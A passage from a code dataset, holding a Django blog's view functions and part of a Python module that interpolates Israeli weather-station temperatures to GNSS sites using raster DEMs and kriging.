#print(result)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"494579691","text":"\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect, render_to_response, get_object_or_404\nfrom .models import Post,Message,ResourceGroup,ResourceItem\nfrom django.core.paginator import Paginator,EmptyPage,PageNotAnInteger\nimport markdown\nfrom django.views.generic import ListView\nfrom .forms import CommentForm,MessageForm\nfrom taggit.models import Tag\nfrom django.db.models import Count\nfrom . import mail\n# Create your views here.\n\n# Post list class-based view\nclass postListView(ListView):\n queryset = Post.published.all()\n context_object_name = 'posts'\n paginate_by = 5\n template_name = 'blogsite/post/index.html'\n\n\n\n# Post list\ndef post_list(request,tag_slug=None):\n object_list=Post.published.all()\n\n # Tag filter: if a tag slug is given, keep only posts carrying that tag\n tag=None\n if tag_slug:\n tag=get_object_or_404(Tag,slug=tag_slug)\n object_list=object_list.filter(tags__in=[tag])\n\n # Pagination\n paginator = Paginator(object_list,5) # 5 posts per page\n page=request.GET.get('page')\n try:\n posts=paginator.page(page)\n except PageNotAnInteger:\n # if page is not an int, deliver the first page\n posts=paginator.page(1)\n except EmptyPage:\n # if page is out of range, deliver the last page\n posts=paginator.page(paginator.num_pages)\n\n return render(request,\n 'blogsite/post/index.html',\n {'posts': posts,\n 'tag':tag})\n\n# Post detail\ndef post_detail(request, post):\n post = get_object_or_404(Post, slug=post,status='published')\n post.body= markdown.markdown(post.body.replace(\"\\r\\n\", '\\n'),extensions=[\n 'extra',\n 'codehilite',\n 'toc',\n ])\n\n # active comments for this post\n comments=post.comments.filter(active=True)\n # tags\n tags=Tag.objects.all()\n\n if request.method == 'POST':\n # a comment was submitted\n comment_form=CommentForm(data=request.POST)\n\n # if valid, create the comment\n if comment_form.is_valid():\n new_comment=comment_form.save(commit=False)\n new_comment.post=post\n new_comment.save()\n else:\n comment_form=CommentForm()\n\n # similar posts, ranked by the number of shared tags\n post_tags_ids = post.tags.values_list('id', flat=True)\n similar_posts = Post.published.filter(tags__in=post_tags_ids) \\\n .exclude(id=post.id)\n similar_posts = similar_posts.annotate(same_tags=Count('tags')) \\\n .order_by('-same_tags', '-publish')[:4]\n\n return render(request,'blogsite/post/detail.html',{'post': post,\n 'comments':comments,\n 'comment_form':comment_form,\n 'similar_posts':similar_posts,\n 'tags':tags})\n# Archive\ndef archives(request):\n\n posts=Post.objects.all().values('create','title','slug')\n return render(request,'blogsite/post/archives.html',{'posts':posts})\n\n# Guestbook\ndef gustbook(request):\n # existing messages\n messages=Message.objects.all()\n # message count\n nums=messages.count()\n\n # message submission\n if request.method == 'POST':\n # a message was submitted\n message_form=MessageForm(data=request.POST)\n\n # if valid, create the message\n if message_form.is_valid():\n message_form.save()# save\n try:\n sender_mail=str(message_form[\"email\"].value())\n sender_name=str(message_form[\"name\"].value())\n sender_msg=str(message_form[\"body\"].value())\n mail.sentemail(sender_mail,sender_name,sender_msg)\n except Exception:\n print(\"Failed to send the notification email\")\n else:\n message_form=MessageForm()\n\n # Pagination\n paginator = Paginator(messages, 5) # 5 messages per page\n page = request.GET.get('page')\n try:\n messages = paginator.page(page)\n except PageNotAnInteger:\n # if page is not an int, deliver the first page\n messages= paginator.page(1)\n except EmptyPage:\n # if page is out of range, deliver the last page\n messages= paginator.page(paginator.num_pages)\n return render(request,'blogsite/post/gustbook.html',{'messages':messages,\n 'nums':nums,\n 'message_form':message_form})\n# Search\ndef search(request):\n # get the query parameter\n s=request.GET.get('s')\n\n #\n error_msg = ''\n if not s:\n error_msg = 'Please enter a keyword'\n\n # simple case-insensitive search on the title\n post_list = Post.objects.filter(title__icontains=s)\n return render(request,\"blogsite/post/search.html\",{'error_msg':error_msg,\n 'post_list':post_list,\n 'key_word':s})\n\n\n# Resource sharing\ndef resource(request):\n\n resource=[]\n\n # get all resource groups\n groups=ResourceGroup.objects.all()\n\n # for each group, fetch its items\n for group in groups:\n items=ResourceItem.objects.filter(group=group)\n resource.append([group,items])\n\n return render(request,\"blogsite/post/resource.html\",{'resource':resource})\n","sub_path":"myblog/blogsite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"141932017","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 10 17:22:51 2019\n\n@author: ziskin\n\"\"\"\nfrom PW_paths import work_yuval\nfrom pathlib import Path\nims_path = work_yuval / 'IMS_T'\ngis_path = work_yuval / 'gis'\nims_10mins_path = ims_path / '10mins'\nawd_path = work_yuval/'AW3D30'\ncwd = Path().cwd()\n# fill missing data:\n#some_missing = ds.tmin.sel(time=ds['time.day'] > 15).reindex_like(ds)\n#\n#In [20]: filled = some_missing.groupby('time.month').fillna(climatology.tmin)\n#\n#In [21]: both = xr.Dataset({'some_missing': some_missing, 'filled': filled})\n\n\ndef clip_raster(fp=awd_path/'Israel_Area.tif',\n out_tif=awd_path/'israel_dem.tif',\n minx=34.0, miny=29.0, maxx=36.5, maxy=34.0):\n def getFeatures(gdf):\n \"\"\"Function to parse features from GeoDataFrame in such a manner that\n rasterio wants them\"\"\"\n import json\n return [json.loads(gdf.to_json())['features'][0]['geometry']]\n\n import rasterio\n from rasterio.plot import show\n from rasterio.plot import show_hist\n from rasterio.mask import mask\n from shapely.geometry import box\n import geopandas as gpd\n from fiona.crs import from_epsg\n import pycrs\n print('reading {}'.format(fp))\n data = rasterio.open(fp)\n # create bounding box using shapely:\n bbox = box(minx, miny, maxx, maxy)\n # insert the bbox into a geodataframe:\n geo = gpd.GeoDataFrame({'geometry': bbox}, index=[0], crs=from_epsg(4326))\n # re-project with the same projection as the data:\n geo = geo.to_crs(crs=data.crs.data)\n # get the geometry coords:\n coords = getFeatures(geo)\n # clipping is done with mask:\n out_img, out_transform = mask(dataset=data, shapes=coords, crop=True)\n # copy meta data:\n out_meta = data.meta.copy()\n # parse the epsg code:\n epsg_code = int(data.crs.data['init'][5:])\n # update the meta data:\n out_meta.update({\"driver\": \"GTiff\",\n \"height\": out_img.shape[1],\n \"width\": out_img.shape[2],\n \"transform\": out_transform,\n \"crs\": pycrs.parse.from_epsg_code(epsg_code).to_proj4()})\n # save to disk:\n print('saving {} to disk.'.format(out_tif))\n with rasterio.open(out_tif, \"w\", **out_meta) as dest:\n dest.write(out_img)\n print('Done!')\n return\n\n\ndef create_israel_area_dem(path):\n \"\"\"merge the raw DSM tif files from the AW3D30 model of the Israel area together\"\"\"\n from aux_gps import path_glob\n import rasterio\n from rasterio.merge import merge\n src_files_to_mosaic = []\n files = path_glob(path, '*DSM*.tif')\n for fp in files:\n src = rasterio.open(fp)\n src_files_to_mosaic.append(src)\n mosaic, out_trans = 
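The `search` view above only matches post titles. If body text should match too, Django's `Q` objects compose OR filters; a hedged sketch under the assumption that `Post` exposes the `body` field already used in `post_detail` (the helper name is hypothetical):

```python
from django.db.models import Q

def search_posts(s):
    # title OR body, case-insensitive; empty query yields an empty queryset
    if not s:
        return Post.objects.none()
    return Post.objects.filter(Q(title__icontains=s) | Q(body__icontains=s))
```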
merge(src_files_to_mosaic)\n out_meta = src.meta.copy()\n out_meta.update({\"driver\": \"GTiff\",\n \"height\": mosaic.shape[1],\n \"width\": mosaic.shape[2],\n \"transform\": out_trans,\n \"crs\": src.crs\n }\n )\n with rasterio.open(path/'Israel_Area.tif', \"w\", **out_meta) as dest:\n dest.write(mosaic)\n return\n\n\ndef parse_cv_results(grid_search_cv):\n from aux_gps import process_gridsearch_results\n \"\"\"parse cv_results from GridsearchCV object\"\"\"\n # only supports neg-abs-mean-error with leaveoneout\n from sklearn.model_selection import LeaveOneOut\n if (isinstance(grid_search_cv.cv, LeaveOneOut)\n and grid_search_cv.scoring == 'neg_mean_absolute_error'):\n\n cds = process_gridsearch_results(grid_search_cv)\n cds = - cds\n return cds\n\n\ndef IMS_interpolating_to_GNSS_stations_israel(dt='2013-10-19T22:00:00',\n stations=None,\n lapse_rate='auto',\n method='okrig',\n variogram='spherical',\n n_neighbors=3,\n start_year='1996',\n cut_days_ago=3,\n plot=False,\n verbose=False,\n savepath=ims_path):\n from pykrige.rk import Krige\n import pandas as pd\n from aux_gps import path_glob\n import xarray as xr\n import numpy as np\n import seaborn as sns\n import matplotlib.pyplot as plt\n import geopandas as gpd\n from sklearn.neighbors import KNeighborsRegressor\n # import time\n\n def pick_model(method, variogram, n_neighbors):\n if method == 'okrig':\n if variogram is not None:\n model = Krige(method='ordinary', variogram_model=variogram,\n verbose=verbose)\n else:\n model = Krige(method='ordinary', variogram_model='linear',\n verbose=verbose)\n elif method == 'knn':\n if n_neighbors is None:\n model = KNeighborsRegressor(n_neighbors=5, weights='distance')\n else:\n model = KNeighborsRegressor(n_neighbors=n_neighbors, weights='distance')\n else:\n raise Exception('{} is not supported yet...'.format(method))\n return model\n\n def prepare_Xy(ts_lr_neutral, T_lats, T_lons):\n import numpy as np\n df = ts_lr_neutral.to_frame()\n df['lat'] = T_lats\n df['lon'] = T_lons\n # df = df.dropna(axis=0)\n c = np.linspace(\n df['lat'].min().item(),\n df['lat'].max().item(),\n df['lat'].shape[0])\n r = np.linspace(\n df['lon'].min().item(),\n df['lon'].max().item(),\n df['lon'].shape[0])\n rr, cc = np.meshgrid(r, c)\n vals = ~np.isnan(ts_lr_neutral)\n X = np.column_stack([rr[vals, vals], cc[vals, vals]])\n # rr_cc_as_cols = np.column_stack([rr.flatten(), cc.flatten()])\n # y = da_scaled.values[vals]\n y = ts_lr_neutral[vals]\n return X, y\n\n def neutrilize_t(ts_vs_alt, lapse_rate):\n ts_lr_neutral = (ts_vs_alt +\n lapse_rate *\n ts_vs_alt.index /\n 1000.0)\n return ts_lr_neutral\n\n def choose_dt_and_lapse_rate(tdf, dt, T_alts, lapse_rate):\n ts = tdf.loc[dt, :]\n # dt_col = dt.strftime('%Y-%m-%d %H:%M')\n # ts.name = dt_col\n # Tloc_df = Tloc_df.join(ts, how='right')\n # Tloc_df = Tloc_df.dropna(axis=0)\n ts_vs_alt = pd.Series(ts.values, index=T_alts)\n ts_vs_alt_for_fit = ts_vs_alt.dropna()\n [a, b] = np.polyfit(ts_vs_alt_for_fit.index.values,\n ts_vs_alt_for_fit.values, 1)\n if lapse_rate == 'auto':\n lapse_rate = np.abs(a) * 1000\n if lapse_rate < 5.0:\n lapse_rate = 5.0\n elif lapse_rate > 10.0:\n lapse_rate = 10.0\n return ts_vs_alt, lapse_rate\n# import time\n dt = pd.to_datetime(dt)\n # read Israeli GNSS sites coords:\n df = pd.read_csv(\n cwd /\n 'israeli_gnss_coords.txt',\n delim_whitespace=True,\n header=0)\n # use station=None to pick all stations, otherwise pick one...\n if stations is not None:\n if isinstance(stations, str):\n stations = [stations]\n df = df.loc[stations, :]\n 
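`create_israel_area_dem` and `clip_raster` are designed to run back to back; a usage sketch using the module's own default paths and bounding box:

```python
# 1) mosaic the raw AW3D30 DSM tiles into one GeoTIFF,
# 2) clip the mosaic to the bounding box used throughout this module
create_israel_area_dem(awd_path)
clip_raster(fp=awd_path / 'Israel_Area.tif',
            out_tif=awd_path / 'israel_dem.tif',
            minx=34.0, miny=29.0, maxx=36.5, maxy=34.0)
```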
print('selected only {} stations'.format(stations))\n else:\n print('selected all israeli stations.')\n # prepare lats and lons of gnss sites:\n gps_lats = np.linspace(df.lat.min(), df.lat.max(), df.lat.values.shape[0])\n gps_lons = np.linspace(df.lon.min(), df.lon.max(), df.lon.values.shape[0])\n gps_lons_lats_as_cols = np.column_stack([gps_lons, gps_lats])\n # load IMS temp data:\n glob_str = 'IMS_TD_israeli_10mins*.nc'\n file = path_glob(ims_path, glob_str=glob_str)[0]\n ds = xr.open_dataset(file)\n time_dim = list(set(ds.dims))[0]\n # slice to a starting year(1996?):\n ds = ds.sel({time_dim: slice(start_year, None)})\n years = sorted(list(set(ds[time_dim].dt.year.values)))\n # get coords and alts of IMS stations:\n T_alts = np.array([ds[x].attrs['station_alt'] for x in ds])\n T_lats = np.array([ds[x].attrs['station_lat'] for x in ds])\n T_lons = np.array([ds[x].attrs['station_lon'] for x in ds])\n print('loading IMS_TD of israeli stations 10mins freq..')\n # transform to dataframe and add coords data to df:\n tdf = ds.to_dataframe()\n if cut_days_ago is not None:\n # use cut_days_ago to drop last x days of data:\n # this is vital bc towards the newest data, TD becomes scarce bc not\n # all of the stations data exists...\n n = cut_days_ago * 144\n tdf.drop(tdf.tail(n).index, inplace=True)\n print('last date to be handled is {}'.format(tdf.index[-1]))\n # use this to solve for a specific datetime:\n if dt is not None:\n dt_col = dt.strftime('%Y-%m-%d %H:%M')\n# t0 = time.time()\n # prepare the ims coords and temp df(Tloc_df) and the lapse rate:\n ts_vs_alt, lapse_rate = choose_dt_and_lapse_rate(tdf, dt, T_alts, lapse_rate)\n if plot:\n fig, ax_lapse = plt.subplots(figsize=(10, 6))\n sns.regplot(x=ts_vs_alt.index, y=ts_vs_alt.values, color='r',\n scatter_kws={'color': 'b'}, ax=ax_lapse)\n suptitle = dt.strftime('%Y-%m-%d %H:%M')\n ax_lapse.set_xlabel('Altitude [m]')\n ax_lapse.set_ylabel('Temperature [degC]')\n ax_lapse.text(0.5, 0.95, 'Lapse_rate: {:.2f} degC/km'.format(lapse_rate),\n horizontalalignment='center', verticalalignment='center',\n transform=ax_lapse.transAxes, fontsize=12, color='k',\n fontweight='bold')\n ax_lapse.grid()\n ax_lapse.set_title(suptitle, fontsize=14, fontweight='bold')\n # neutrilize the lapse rate effect:\n ts_lr_neutral = neutrilize_t(ts_vs_alt, lapse_rate)\n # prepare the regressors(IMS stations coords) and the\n # target(IMS temperature at the coords):\n X, y = prepare_Xy(ts_lr_neutral, T_lats, T_lons)\n # pick the model and params:\n model = pick_model(method, variogram, n_neighbors)\n # fit the model:\n model.fit(X, y)\n # predict at the GNSS stations coords:\n interpolated = model.predict(gps_lons_lats_as_cols).reshape((gps_lats.shape))\n # add prediction to df:\n df[dt_col] = interpolated\n # fix for lapse rate:\n df[dt_col] -= lapse_rate * df['alt'] / 1000.0\n # concat gnss stations and Tloc DataFrames:\n Tloc_df = pd.DataFrame(T_lats, index=tdf.columns)\n Tloc_df.columns = ['lat']\n Tloc_df['lon'] = T_lons\n Tloc_df['alt'] = T_alts\n all_df = pd.concat([df, Tloc_df],axis=0)\n # fname = gis_path / 'ne_10m_admin_0_sovereignty.shp'\n # fname = gis_path / 'gadm36_ISR_0.shp'\n # ax = plt.axes(projection=ccrs.PlateCarree())\n if plot:\n fig, ax = plt.subplots(figsize=(6, 10))\n # shdf = salem.read_shapefile(salem.get_demo_file('world_borders.shp'))\n # shdf = salem.read_shapefile(gis_path / 'Israel_and_Yosh.shp')\n isr = gpd.read_file(gis_path / 'Israel_and_Yosh.shp')\n # shdf = shdf.loc[shdf['CNTRY_NAME'] == 'Israel'] # remove other countries\n isr.crs = 
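The lapse-rate handling above is easiest to sanity-check in isolation: subtracting a constant lapse rate should flatten a purely altitude-driven temperature profile, and re-applying it at a target altitude recovers the expected value. A toy check with invented numbers:

```python
import numpy as np
import pandas as pd

lapse_rate = 6.5                       # degC/km, inside the 5-10 clipping range above
alts = np.array([0.0, 400.0, 1000.0])  # station altitudes [m]
temps = pd.Series(30.0 - lapse_rate * alts / 1000.0, index=alts)

neutral = temps + lapse_rate * temps.index / 1000.0    # all exactly 30.0
# after horizontal interpolation, a 700 m site gets the correction back:
t_site = neutral.mean() - lapse_rate * 700.0 / 1000.0  # 25.45 degC
```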
{'init': 'epsg:4326'}\n time_snap = gpd.GeoDataFrame(all_df, geometry=gpd.points_from_xy(all_df.lon,\n all_df.lat),\n crs=isr.crs)\n time_snap = gpd.sjoin(time_snap, isr, op='within')\n isr.plot(ax=ax)\n cmap = plt.get_cmap('rainbow', 10)\n time_snap.plot(ax=ax, column=dt_col, cmap=cmap,\n edgecolor='black', legend=True)\n for x, y, label in zip(df.lon, df.lat,\n df.index):\n ax.annotate(label, xy=(x, y), xytext=(3, 3),\n textcoords=\"offset points\")\n suptitle = dt.strftime('%Y-%m-%d %H:%M')\n fig.suptitle(suptitle, fontsize=14, fontweight='bold')\n else:\n # do the above (except plotting) for the entire data, saving each year:\n for year in years:\n dts = tdf.index[tdf.index.year == year]\n # read Israeli GNSS sites coords again:\n df = pd.read_csv(\n cwd /\n 'israeli_gnss_coords.txt',\n delim_whitespace=True,\n header=0)\n cnt = 1\n dt_col_list = []\n inter_list = []\n # t0 = time.time()\n# t1 = time.time()\n# t2 = time.time()\n# t3 = time.time()\n# t4 = time.time()\n# t5 = time.time()\n# t6 = time.time()\n# t7 = time.time()\n# t8 = time.time()\n for dt in dts:\n dt_col = dt.strftime('%Y-%m-%d %H:%M')\n if np.mod(cnt, 144) == 0:\n # t1 = time.time()\n print('working on {}'.format(dt_col)) \n # print('time1:{:.2f} seconds'.format(t1-t0))\n # t0 = time.time()\n # prepare the ims coords and temp df(Tloc_df) and\n # the lapse rate:\n ts_vs_alt, lapse_rate = choose_dt_and_lapse_rate(tdf, dt, T_alts, lapse_rate)\n# if np.mod(cnt, 144) == 0:\n# t2 = time.time()\n# print('time2: {:.4f}'.format((t2-t1)*144))\n # neutrilize the lapse rate effect:\n ts_lr_neutral = neutrilize_t(ts_vs_alt, lapse_rate)\n # prepare the regressors(IMS stations coords) and the\n # target(IMS temperature at the coords):\n# if np.mod(cnt, 144) == 0:\n# t3 = time.time()\n# print('time3: {:.4f}'.format((t3-t2)*144))\n X, y = prepare_Xy(ts_lr_neutral, T_lats, T_lons)\n# if np.mod(cnt, 144) == 0:\n# t4 = time.time()\n# print('time4: {:.4f}'.format((t4-t3)*144))\n # pick model and params:\n model = pick_model(method, variogram, n_neighbors)\n# if np.mod(cnt, 144) == 0:\n# t5 = time.time()\n# print('time5: {:.4f}'.format((t5-t4)*144))\n # fit the model:\n model.fit(X, y)\n# if np.mod(cnt, 144) == 0:\n# t6 = time.time()\n# print('time6: {:.4f}'.format((t6-t5)*144))\n # predict at the GNSS stations coords:\n interpolated = model.predict(gps_lons_lats_as_cols).reshape((gps_lats.shape))\n# if np.mod(cnt, 144) == 0:\n# t7 = time.time()\n# print('time7: {:.4f}'.format((t7-t6)*144))\n # fix for lapse rate:\n interpolated -= lapse_rate * df['alt'].values / 1000.0\n# if np.mod(cnt, 144) == 0:\n# t8 = time.time()\n# print('time8: {:.4f}'.format((t8-t7)*144))\n # add to list:\n dt_col_list.append(dt_col)\n inter_list.append(interpolated)\n cnt += 1\n # convert to dataset:\n # da = xr.DataArray(df.iloc[:, 3:].values, dims=['station', 'time'])\n da = xr.DataArray(inter_list, dims=['time', 'station'])\n da['station'] = df.index\n da['time'] = pd.to_datetime(dt_col_list)\n da = da.sortby('time')\n ds = da.to_dataset(dim='station')\n for da in ds:\n ds[da].attrs['units'] = 'degC'\n filename = 'GNSS_TD_{}.nc'.format(year)\n ds.to_netcdf(savepath / filename, 'w')\n print('saved {} to {}'.format(filename, savepath))\n # return\n print('concatenating all TD years...')\n concat_GNSS_TD(savepath)\n# t1 = time.time()\n # geo_snap = geo_pandas_time_snapshot(var='TD', datetime=dt, plot=False)\n# total = t1-t0\n# print(total)\n return\n\n\ndef resample_GNSS_TD(path=ims_path):\n from aux_gps import path_glob\n import xarray as xr\n\n def 
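A usage sketch for the routine above, assuming the IMS netCDF files already sit in `ims_path` (the keyword arguments mirror the signature's defaults):

```python
# interpolate a single timestamp to all Israeli GNSS sites, with plots
IMS_interpolating_to_GNSS_stations_israel(dt='2013-10-19T22:00:00',
                                          method='okrig',
                                          variogram='spherical',
                                          plot=True)

# or process every 10-min stamp since 1996 and write GNSS_TD_<year>.nc files
IMS_interpolating_to_GNSS_stations_israel(dt=None, plot=False, savepath=ims_path)
```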
resample_GNSS_TD(ds, path, sample, sample_rate='1H'):\n # station = da.name\n print('resampaling all GNSS stations to {}'.format(sample[sample_rate]))\n years = [str(x)\n for x in sorted(list(set(ds[time_dim].dt.year.values)))]\n ymin = ds[time_dim].min().dt.year.item()\n ymax = ds[time_dim].max().dt.year.item()\n years_str = '{}_{}'.format(ymin, ymax)\n if sample_rate == '1H' or sample_rate == '3H':\n dsr_list = []\n for year in years:\n print('resampling {} of year {}'.format(sample_rate, year))\n dsr = ds.sel({time_dim: year}).resample(\n {time_dim: sample_rate}, keep_attrs=True, skipna=True).mean(keep_attrs=True)\n dsr_list.append(dsr)\n print('concatenating...')\n dsr = xr.concat(dsr_list, time_dim)\n else:\n if sample_rate == '5min':\n dsr = ds.resample({time_dim: sample_rate}, keep_attrs=True,\n skipna=True).ffill()\n else:\n dsr = ds.resample({time_dim: sample_rate},\n keep_attrs=True,\n skipna=True).mean(keep_attrs=True)\n new_filename = '_'.join(['GNSS', sample[sample_rate], 'TD_ALL',\n years_str])\n new_filename = new_filename + '.nc'\n print('saving all resmapled GNSS stations to {}'.format(path))\n comp = dict(zlib=True, complevel=9) # best compression\n encoding = {var: comp for var in dsr.data_vars}\n dsr.to_netcdf(path / new_filename, 'w', encoding=encoding)\n print('Done resampling!')\n return\n # first, load GNSS_TD_ALL:\n str_glob = 'GNSS_TD_ALL*.nc'\n file = path_glob(path, str_glob)[0]\n ds = xr.open_dataset(file)\n ds.load()\n time_dim = list(set(ds.dims))[0]\n sample = {'5min': '5mins', '1H': 'hourly', '3H': '3hourly',\n 'D': 'Daily', 'W': 'weekly', 'MS': 'monthly'}\n for key in sample.keys():\n resample_GNSS_TD(ds, path, sample, sample_rate=key)\n \n# for sta in stations:\n# # take each station's TD and copy to GNSS folder 'temperature':\n# savepath = GNSS / sta / 'temperature'\n# savepath.mkdir(parents=True, exist_ok=True)\n# # first save a 5-min resampled version and save:\n# da = ds[sta].resample(time='5min').ffill()\n# ymin = da[time_dim].min().dt.year.item()\n# ymax = da[time_dim].max().dt.year.item()\n# years_str = '{}_{}'.format(ymin, ymax)\n# new_filename = '_'.join([sta.upper(), 'TD', years_str])\n# new_filename = new_filename + '.nc'\n# print('saving resmapled station {} to {}'.format(sta, savepath))\n# comp = dict(zlib=True, complevel=9) # best compression\n# encoding = {var: comp for var in da.to_dataset(name=da.name).data_vars}\n# da.to_netcdf(savepath / new_filename, 'w', encoding=encoding)\n# print('Done resampling!')\n# # finally, resample to all samples and save:\n# for key in sample.keys():\n# resample_GNSS_TD(da, savepath, sample, sample_rate=key)\n return\n\n\ndef concat_GNSS_TD(path=ims_path):\n import xarray as xr\n from aux_gps import path_glob\n files = path_glob(path, 'GNSS_TD_*.nc')\n years = sorted([file.as_posix().split('/')[-1].split('_')[-1].split('.')[0]\n for file in files])\n ds_list = [xr.open_dataset(x) for x in files]\n time_dim = list(set(ds_list[0].dims))[0]\n ds = xr.concat(ds_list, time_dim)\n ds = ds.sortby(time_dim)\n comp = dict(zlib=True, complevel=9) # best compression\n encoding = {var: comp for var in ds.data_vars}\n filename = 'GNSS_TD_ALL_{}-{}.nc'.format(years[0], years[-1])\n print('saving...')\n ds.to_netcdf(path / filename, 'w', encoding=encoding)\n print('{} was saved to {}'.format(filename, path))\n return ds\n\n\ndef Interpolating_models_ims(time='2013-10-19T22:00:00', var='TD', plot=True,\n gis_path=gis_path, method='okrig',\n dem_path=work_yuval / 'AW3D30', lapse_rate=5.,\n cv=None, rms=None, 
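The resampling rules above (block means when downsampling, `ffill` for the 5-min upsample) can be checked on a toy series; a small self-contained sketch:

```python
import numpy as np
import pandas as pd
import xarray as xr

time = pd.date_range('2019-01-01', periods=18, freq='10min')
da = xr.DataArray(np.arange(18.0), dims=['time'], coords={'time': time})

hourly = da.resample(time='1H').mean()       # 10-min -> hourly block means
five_min = da.resample(time='5min').ffill()  # upsample: repeat the last value
print(hourly.values[:2])                     # [2.5 8.5]
print(five_min.values[:4])                   # [0. 0. 1. 1.]
```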
gridsearch=False):\n \"\"\"main 2d_interpolation from stations to map\"\"\"\n # cv usage is {'kfold': 5} or {'rkfold': [2, 3]}\n # TODO: try 1d modeling first, like T=f(lat)\n from sklearn.gaussian_process import GaussianProcessRegressor\n from sklearn.neighbors import KNeighborsRegressor\n from pykrige.rk import Krige\n import numpy as np\n from sklearn.svm import SVR\n from sklearn.linear_model import LinearRegression\n from sklearn.ensemble import RandomForestRegressor\n from scipy.spatial import Delaunay\n from scipy.interpolate import griddata\n from sklearn.metrics import mean_squared_error\n from aux_gps import coarse_dem\n import seaborn as sns\n import matplotlib.pyplot as plt\n import pyproj\n from sklearn.utils.estimator_checks import check_estimator\n from pykrige.compat import GridSearchCV\n lla = pyproj.Proj(proj='latlong', ellps='WGS84', datum='WGS84')\n ecef = pyproj.Proj(proj='geocent', ellps='WGS84', datum='WGS84')\n\n def parse_cv(cv):\n from sklearn.model_selection import KFold\n from sklearn.model_selection import RepeatedKFold\n from sklearn.model_selection import LeaveOneOut\n \"\"\"input: a cv dict such as {'kfold': 5}, {'rkfold': [n, m]} or {'loo': None}\"\"\"\n # dispatch on the requested CV scheme:\n if 'kfold' in cv.keys():\n n_splits = cv['kfold']\n print('CV is KFold with n_splits={}'.format(n_splits))\n return KFold(n_splits=n_splits)\n if 'rkfold' in cv.keys():\n n_splits = cv['rkfold'][0]\n n_repeats = cv['rkfold'][1]\n print('CV is RepeatedKFold with n_splits={},'.format(n_splits) +\n ' n_repeats={}'.format(n_repeats))\n return RepeatedKFold(n_splits=n_splits, n_repeats=n_repeats,\n random_state=42)\n if 'loo' in cv.keys():\n return LeaveOneOut()\n # from aux_gps import scale_xr\n da = create_lat_lon_mesh(points_per_degree=250) # 500?\n awd = coarse_dem(da)\n awd = awd.values\n geo_snap = geo_pandas_time_snapshot(var=var, datetime=time, plot=False)\n if var == 'TD':\n [a, b] = np.polyfit(geo_snap['alt'].values, geo_snap['TD'].values, 1)\n if lapse_rate == 'auto':\n lapse_rate = np.abs(a) * 1000\n fig, ax_lapse = plt.subplots(figsize=(10, 6))\n sns.regplot(data=geo_snap, x='alt', y='TD', color='r',\n scatter_kws={'color': 'b'}, ax=ax_lapse)\n suptitle = time.replace('T', ' ')\n ax_lapse.set_xlabel('Altitude [m]')\n ax_lapse.set_ylabel('Temperature [degC]')\n ax_lapse.text(0.5, 0.95, 'Lapse_rate: {:.2f} degC/km'.format(lapse_rate),\n horizontalalignment='center', verticalalignment='center',\n transform=ax_lapse.transAxes, fontsize=12, color='k',\n fontweight='bold')\n ax_lapse.grid()\n ax_lapse.set_title(suptitle, fontsize=14, fontweight='bold')\n# fig.suptitle(suptitle, fontsize=14, fontweight='bold')\n alts = []\n for i, row in geo_snap.iterrows():\n lat = da.sel(lat=row['lat'], method='nearest').lat.values\n lon = da.sel(lon=row['lon'], method='nearest').lon.values\n alt = row['alt']\n if lapse_rate is not None and var == 'TD':\n da.loc[{'lat': lat, 'lon': lon}] = row[var] + \\\n lapse_rate * alt / 1000.0\n alts.append(alt)\n elif lapse_rate is None or var != 'TD':\n da.loc[{'lat': lat, 'lon': lon}] = row[var]\n alts.append(alt)\n # da_scaled = scale_xr(da)\n c = np.linspace(min(da.lat.values), max(da.lat.values), da.shape[0])\n r = np.linspace(min(da.lon.values), max(da.lon.values), da.shape[1])\n rr, cc = np.meshgrid(r, c)\n vals = ~np.isnan(da.values)\n if lapse_rate is None:\n Xrr, Ycc, Z = pyproj.transform(\n lla, ecef, rr[vals], cc[vals], np.array(alts), radians=False)\n X = np.column_stack([Xrr, Ycc, Z])\n # awd was already reduced to a plain ndarray above, so pass it directly\n XX, YY, ZZ = pyproj.transform(lla, ecef, rr, cc, awd,\n radians=False)\n rr_cc_as_cols = 
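The `cv` argument is a small dict convention decoded by `parse_cv`; the accepted shapes, matching the docstring above:

```python
Interpolating_models_ims(time='2013-10-19T22:00:00', cv={'kfold': 5})        # 5-fold
Interpolating_models_ims(time='2013-10-19T22:00:00', cv={'rkfold': [2, 3]})  # 2 splits x 3 repeats
Interpolating_models_ims(time='2013-10-19T22:00:00', cv={'loo': None})       # leave-one-out
```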
np.column_stack([XX.flatten(), YY.flatten(),\n ZZ.flatten()])\n else:\n X = np.column_stack([rr[vals], cc[vals]])\n rr_cc_as_cols = np.column_stack([rr.flatten(), cc.flatten()])\n # y = da_scaled.values[vals]\n y = da.values[vals]\n if method == 'gp-rbf':\n from sklearn.gaussian_process.kernels import RBF\n from sklearn.gaussian_process.kernels import WhiteKernel\n kernel = 1.0 * RBF(length_scale=0.25, length_scale_bounds=(1e-2, 1e3)) \\\n + WhiteKernel(noise_level=0.01, noise_level_bounds=(1e-10, 1e+1))\n# kernel = None\n model = GaussianProcessRegressor(alpha=0.0, kernel=kernel,\n n_restarts_optimizer=5,\n random_state=42, normalize_y=True)\n\n elif method == 'gp-qr':\n from sklearn.gaussian_process.kernels import RationalQuadratic\n from sklearn.gaussian_process.kernels import WhiteKernel\n kernel = RationalQuadratic(length_scale=100.0) \\\n + WhiteKernel(noise_level=0.01, noise_level_bounds=(1e-10, 1e+1))\n model = GaussianProcessRegressor(alpha=0.0, kernel=kernel,\n n_restarts_optimizer=5,\n random_state=42, normalize_y=True)\n elif method == 'knn':\n model = KNeighborsRegressor(n_neighbors=5, weights='distance')\n elif method == 'svr':\n model = SVR(C=1.0, cache_size=200, coef0=0.0, degree=3, epsilon=0.1,\n gamma='auto_deprecated', kernel='rbf', max_iter=-1,\n shrinking=True, tol=0.001, verbose=False)\n elif method == 'okrig':\n model = Krige(method='ordinary', variogram_model='spherical',\n verbose=True)\n elif method == 'ukrig':\n model = Krige(method='universal', variogram_model='linear',\n verbose=True)\n# elif method == 'okrig3d':\n# # don't bother - MemoryError...\n# model = OrdinaryKriging3D(rr[vals], cc[vals], np.array(alts),\n# da.values[vals], variogram_model='linear',\n# verbose=True)\n# awd = 